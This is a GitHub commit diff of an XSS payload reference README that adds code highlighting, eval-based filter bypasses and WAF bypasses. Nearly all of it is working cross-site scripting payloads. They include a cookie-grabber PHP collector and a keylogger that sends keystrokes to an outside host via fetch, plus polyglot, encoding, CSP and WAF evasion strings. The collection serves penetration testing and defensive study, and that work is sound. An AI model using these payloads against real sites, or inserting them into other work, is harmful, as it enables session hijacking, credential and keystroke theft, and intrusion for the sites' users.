ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 17:28:49 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XSS Colors highlighting + JS code eval

Browse Source
This commit is contained in:
Swissky 2018-06-27 20:00:17 +02:00
parent a7439d812d
commit 4a0fc27578
1 changed files with 105 additions and 61 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

166
XSS injection/README.md
View File

@ -8,11 +8,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in files](#xss-in-files) - [XSS in files](#xss-in-files)
- [Polyglot XSS](#polyglot-xss) - [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
- [Common WAF Bypas](#common-waf-bypass)
## Exploit code or POC ## Exploit code or POC
Cookie grabber for XSS Cookie grabber for XSS
``` ```php
<?php <?php
// How to use it // How to use it
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script> # <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
@ -27,7 +28,7 @@ fclose($fp);
``` ```
Keylogger for XSS Keylogger for XSS
``` ```html
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'> <img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
``` ```
@ -41,13 +42,13 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
## Identify an XSS endpoint ## Identify an XSS endpoint
``` ```javascript
<script>debugger;</script> <script>debugger;</script>
``` ```
## XSS in HTML/Applications ## XSS in HTML/Applications
XSS Basic XSS Basic
``` ```javascript
Basic payload Basic payload
<script>alert('XSS')</script> <script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt> <scr<script>ipt>alert('XSS')</scr<script>ipt>
@ -74,7 +75,7 @@ Svg payload
``` ```
XSS for HTML5 XSS for HTML5
``` ```javascript
<body onload=alert(/XSS/.source)> <body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)> <input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)>
@ -89,14 +90,14 @@ XSS for HTML5
``` ```
XSS using script tag (external payload) XSS using script tag (external payload)
``` ```javascript
<script src=14.rs> <script src=14.rs>
you can alsoo specify an arbitratry payload with 14.rs/#payload you can alsoo specify an arbitratry payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain) e.g: 14.rs/#alert(document.domain)
``` ```
XSS in META tag XSS in META tag
``` ```javascript
Base64 encoded Base64 encoded
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
@ -107,24 +108,24 @@ With an additional URL
``` ```
XSS in Hidden input XSS in Hidden input
``` ```javascript
<input type="hidden" accesskey="X" onclick="alert(1)"> <input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event Use CTRL+SHIFT+X to trigger the onclick event
``` ```
DOM XSS DOM XSS
``` ```javascript
#"><img src=/ onerror=alert(2)> #"><img src=/ onerror=alert(2)>
``` ```
XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)
``` ```javascript
-(confirm)(document.domain)// -(confirm)(document.domain)//
; alert(1);// ; alert(1);//
``` ```
XSS URL XSS URL
``` ```javascript
URL/<svg onload=alert(1)> URL/<svg onload=alert(1)>
URL/<script>alert('XSS');// URL/<script>alert('XSS');//
URL/<input autofocus onfocus=alert(1)> URL/<input autofocus onfocus=alert(1)>
@ -133,7 +134,7 @@ URL/<input autofocus onfocus=alert(1)>
## XSS in wrappers javascript and data URI ## XSS in wrappers javascript and data URI
XSS with javascript: XSS with javascript:
``` ```javascript
javascript:prompt(1) javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341 %26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
@ -151,7 +152,7 @@ java%09script:alert(1) - Horizontal tab (\t)
java%0dscript:alert(1) - CR (\r) java%0dscript:alert(1) - CR (\r)
Using the escape character Using the escape character
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
Using the newline and a comment // Using the newline and a comment //
javascript://%0Aalert(1) javascript://%0Aalert(1)
@ -159,19 +160,19 @@ javascript://anything%0D%0A%0D%0Awindow.alert(1)
``` ```
XSS with data: XSS with data:
``` ```javascript
data:text/html,<script>alert(0)</script> data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
``` ```
XSS with vbscript: only IE XSS with vbscript: only IE
``` ```javascript
vbscript:msgbox("XSS") vbscript:msgbox("XSS")
``` ```
## XSS in files ## XSS in files
** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup. ** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
``` ```xml
<name> <name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value> <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name> </name>
@ -179,7 +180,7 @@ vbscript:msgbox("XSS")
XSS in XML XSS in XML
``` ```xml
<html> <html>
<head></head> <head></head>
<body> <body>
@ -190,7 +191,7 @@ XSS in XML
XSS in SVG XSS in SVG
``` ```xml
<?xml version="1.0" standalone="no"?> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
@ -203,7 +204,7 @@ XSS in SVG
``` ```
XSS in SVG (short) XSS in SVG (short)
``` ```javascript
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@ -229,7 +230,7 @@ more payloads in ./files
XSS in SWF flash application XSS in SWF flash application
``` ```javascript
flashmediaelement.swf?jsinitfunctio%gn=alert`1` flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1) flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000 ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
@ -250,7 +251,7 @@ phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domai
XSS in CSS XSS in CSS
``` ```html
<!DOCTYPE html> <!DOCTYPE html>
<html> <html>
<head> <head>
@ -270,27 +271,27 @@ div {
## Polyglot XSS ## Polyglot XSS
Polyglot XSS - 0xsobky Polyglot XSS - 0xsobky
``` ```javascript
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
``` ```
Polyglot XSS - Ashar Javed Polyglot XSS - Ashar Javed
``` ```javascript
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> ">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
``` ```
Polyglot XSS - Mathias Karlsson Polyglot XSS - Mathias Karlsson
``` ```javascript
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)// " onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
``` ```
Polyglot XSS - Rsnake Polyglot XSS - Rsnake
``` ```javascript
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
``` ```
Polyglot XSS - Daniel Miessler Polyglot XSS - Daniel Miessler
``` ```javascript
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
@ -306,11 +307,11 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514) Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg) ![https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg](https://pbs.twimg.com/media/DWiLk3UX4AE0jJs.jpg)
``` ```javascript
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``> -->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
``` ```
![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large) ![https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large](https://pbs.twimg.com/media/DWfIizMVwAE2b0g.jpg:large)
``` ```javascript
<svg%0Ao%00nload=%09((pro\u006dpt))()// <svg%0Ao%00nload=%09((pro\u006dpt))()//
``` ```
@ -319,28 +320,40 @@ Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
## Filter Bypass and exotic payloads ## Filter Bypass and exotic payloads
Bypass case sensitive Bypass case sensitive
``` ```javascript
<sCrIpt>alert(1)</ScRipt> <sCrIpt>alert(1)</ScRipt>
``` ```
Bypass tag blacklist Bypass tag blacklist
``` ```javascript
<script x> <script x>
<script x>alert('XSS')<script y> <script x>alert('XSS')<script y>
``` ```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari Bypass word blacklist with code evaluation
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
``` ```
Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
```javascript
<img src='1' onerror='alert(0)' < <img src='1' onerror='alert(0)' <
``` ```
Bypass quotes for string Bypass quotes for string
``` ```javascript
String.fromCharCode(88,83,83) String.fromCharCode(88,83,83)
``` ```
Bypass quotes in script tag Bypass quotes in script tag
``` ```javascript
http://localhost/bla.php?test=</script><script>alert(1)</script> http://localhost/bla.php?test=</script><script>alert(1)</script>
<html> <html>
<script> <script>
@ -350,46 +363,46 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
``` ```
Bypass quotes in mousedown event Bypass quotes in mousedown event
``` ```javascript
<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a> <a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
You can bypass a single quote with &#39; in an on mousedown event handler You can bypass a single quote with &#39; in an on mousedown event handler
``` ```
Bypass dot filter Bypass dot filter
``` ```javascript
<script>window['alert'](document['domain'])<script> <script>window['alert'](document['domain'])<script>
``` ```
Bypass parenthesis for string - Firefox Bypass parenthesis for string - Firefox
``` ```javascript
alert`1` alert`1`
``` ```
Bypass onxxxx= blacklist Bypass onxxxx= blacklist
``` ```javascript
<object onafterscriptexecute=confirm(0)> <object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)> <object onbeforescriptexecute=confirm(0)>
``` ```
Bypass onxxx= filter with a null byte/vertical tab - IE/Safari Bypass onxxx= filter with a null byte/vertical tab - IE/Safari
``` ```javascript
<img src='1' onerror\x00=alert(0) /> <img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) /> <img src='1' onerror\x0b=alert(0) />
``` ```
Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari Bypass onxxx= filter with a '/' - IE/Firefox/Chrome/Safari
``` ```javascript
<img src='1' onerror/=alert(0) /> <img src='1' onerror/=alert(0) />
``` ```
Bypass space filter with "/" - IE/Firefox/Chrome/Safari Bypass space filter with "/" - IE/Firefox/Chrome/Safari
``` ```javascript
<img/src='1'/onerror=alert(0)> <img/src='1'/onerror=alert(0)>
``` ```
Bypass space filter with 0x0c/^L Bypass space filter with 0x0c/^L
``` ```javascript
<svg onload = alert(1) > <svg onload = alert(1) >
@ -400,12 +413,12 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
Bypass document blacklist Bypass document blacklist
``` ```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
``` ```
Bypass using javascript inside a string Bypass using javascript inside a string
``` ```javascript
<script> <script>
foo="text </script><script>alert(1)</script>"; foo="text </script><script>alert(1)</script>";
</script> </script>
@ -413,7 +426,7 @@ foo="text </script><script>alert(1)</script>";
Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) Bypass using an alternate way to execute an alert - [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040)
``` ```javascript
window['alert'](0) window['alert'](0)
parent['alert'](1) parent['alert'](1)
self['alert'](2) self['alert'](2)
@ -430,8 +443,32 @@ content['alert'](6)
[12].forEach(alert); [12].forEach(alert);
``` ```
Bypass using an alternate way to trigger an alert Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
```javascript
eval('ale'+'rt(0)');
Function("ale"+"rt(1)")();
new Function`al\ert\`6\``;
constructor.constructor("aler"+"t(3)")();
[].filter.constructor('ale'+'rt(4)')();
top["al"+"ert"](5);
top[8680439..toString(30)](7);
top[/al/.source+/ert/.source](8);
top['al\x65rt'](9);
open('java'+'script:ale'+'rt(11)');
location='javascript:ale'+'rt(12)';
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`al\x65rt\x2814\x29```;
``` ```
Bypass using an alternate way to trigger an alert
```javascript
var i = document.createElement("iframe"); var i = document.createElement("iframe");
i.onload = function(){ i.onload = function(){
i.contentWindow.alert(1); i.contentWindow.alert(1);
@ -452,12 +489,12 @@ XSSObject.proxy(window, 'alert', 'window.alert', false);
``` ```
Bypass ">" using nothing #trololo (you don't need to close your tags) Bypass ">" using nothing #trololo (you don't need to close your tags)
``` ```javascript
<svg onload=alert(1)// <svg onload=alert(1)//
``` ```
Bypass ';' using another character Bypass ';' using another character
``` ```javascript
'te' * alert('*') * 'xt'; 'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt'; 'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt'; 'te' % alert('%') % 'xt';
@ -476,23 +513,23 @@ Bypass ';' using another character
``` ```
Bypass using HTML encoding Bypass using HTML encoding
``` ```javascript
%26%2397;lert(1) %26%2397;lert(1)
``` ```
Bypass using Katakana (https://github.com/aemkei/katakana.js) Bypass using Katakana (https://github.com/aemkei/katakana.js)
``` ```javascript
javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')() javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
``` ```
Bypass using Octal encoding Bypass using Octal encoding
``` ```javascript
javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76'
``` ```
Bypass using Unicode Bypass using Unicode
``` ```javascript
Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<) transformed into U+003C LESS­THAN SIGN (<)
@ -517,7 +554,7 @@ E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert
``` ```
Bypass using Unicode converted to uppercase Bypass using Unicode converted to uppercase
``` ```javascript
İ (%c4%b0).toLowerCase() => i İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S ſ (%c5%bf) .toUpperCase() => S
@ -528,7 +565,7 @@ Bypass using Unicode converted to uppercase
``` ```
Bypass using overlong UTF-8 Bypass using overlong UTF-8
``` ```javascript
< = %C0%BC = %E0%80%BC = %F0%80%80%BC < = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE > = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
@ -538,24 +575,24 @@ Bypass using overlong UTF-8
``` ```
Bypass using UTF-7 Bypass using UTF-7
``` ```javascript
+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
``` ```
Bypass using UTF-16be Bypass using UTF-16be
``` ```javascript
%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00
\x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>
``` ```
Bypass using UTF-32 Bypass using UTF-32
``` ```js
%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E
``` ```
Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.) Bypass using BOM - Byte Order Mark (The page must begin with the BOM character.)
BOM character allows you to override charset of the page BOM character allows you to override charset of the page
``` ```js
BOM Character for UTF-16 Encoding: BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE Little Endian : 0xFF 0xFE
@ -569,7 +606,7 @@ XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o
Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27))
//google.com/complete/search?client=chrome&jsonp=alert(1); //google.com/complete/search?client=chrome&jsonp=alert(1);
``` ```js
<script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>" <script/src=//google.com/complete/search?client=chrome%26jsonp=alert(1);>"
``` ```
@ -583,7 +620,7 @@ Bypass using weird encoding or native interpretation to hide the payload (alert(
``` ```
Exotic payloads Exotic payloads
``` ```javascript
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> <img src=1 alt=al lang=ert onerror=top[alt+lang](0)>
<script>$=1,alert($)</script> <script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~> <script ~~~>confirm(1)</script ~~~>
@ -597,13 +634,20 @@ Exotic payloads
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'> <iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
``` ```
## Incapsula WAF Bypass - 8th march ## Common WAF Bypass
```
### Incapsula WAF Bypass - 8th march
```javascript
anythinglr00</script><script>alert(document.domain)</script>uxldz anythinglr00</script><script>alert(document.domain)</script>uxldz
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
``` ```
### Akamai WAF bypass by @zseano - 18th june
```javascript
?"></script><base%20c%3D=href%3Dhttps:\mysite>
```
## More fun ? ## More fun ?
This section will be used for the "fun/interesting/useless" stuff. This section will be used for the "fun/interesting/useless" stuff.